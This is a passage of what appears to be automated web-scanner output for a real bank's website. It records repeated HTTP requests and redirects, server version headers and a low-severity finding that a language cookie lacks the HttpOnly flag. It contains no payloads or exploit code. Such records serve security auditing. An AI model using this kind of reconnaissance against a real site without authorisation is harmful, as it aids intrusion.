X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fhome-equity%2floans.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fhome-equity%252floans.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:22:53 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 44231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2floans%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 184
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/compare.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2floans%2fcompare.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 184
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fcompare.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2floans%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 184
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/home-equity.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2floans%2fhome-equity.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fhome-equity.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /moneyhelp/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:14:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:24:12 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 19634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/home-refinance.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fhome-refinance.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 195
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fhome-refinance.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/overview.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 148
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/faq.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2ffaq.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 189
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252ffaq.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/mobile-banking/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2fmobile-banking%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 212
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252fmobile-banking%252fdefault.aspx">here</a>.</h2> </bo ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/olbdemo.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2folbdemo.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 193
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252folbdemo.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /open-account.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fopen-account.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fopen-account.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal-investing/overview.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Feb 2011 22:16:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.charterone.com/personal-investing/default.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /promotions/q1a/web.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: CampaignInfo=url%3d%2fpromotions%2fq1a%2fweb.aspx%3bdate%3d2%2f2%2f2011+12%3a00%3a00+AM%3bmeta%3dref%253d%253bpath%253d%252fpromotions%252fq1a%252fweb.aspx; expires=Mon, 01-Aug-2011 21:15:29 GMT; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:29 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 10578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 194
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/cds.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fcds.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 190
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fcds.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/college-saver.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fcollege-saver.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 200
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fcollege-saver.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 194
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/homebuyer-savings.aspx?WT.ac=homebuyersavings HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fhomebuyer-savings.aspx%3fwt.ac%3dhomebuyersavings Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 235
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fhomebuyer-savings.aspx%253fwt.ac%253dhomebuyersaving ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/money-markets.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fmoney-markets.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 200
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fmoney-markets.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /security/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:37:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:47:55 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 14986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /security/equal-housing-lender.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:26:23 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 13792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
